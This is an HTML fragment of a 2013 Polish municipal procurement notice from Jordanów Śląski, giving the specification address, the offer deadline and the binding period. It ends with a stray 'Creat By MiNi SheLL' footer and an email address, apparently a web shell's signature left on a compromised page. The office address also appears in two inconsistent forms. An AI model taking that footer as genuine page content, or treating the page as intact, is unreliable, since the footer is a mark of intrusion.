<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jordanowslaski.pl, www.bip.jordanowslaski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Jordanów Śląski, ul. Wrocławska 5, 55-065 Jordanów Śląski..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.05.2013 godzina 10:00, miejsce: Urząd Gminy Jordanów Śląski, ul. Wrocławska 55, 55-065 Jordanów Śląski, pokój nr 8 I p. (sekretariat urzędu).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com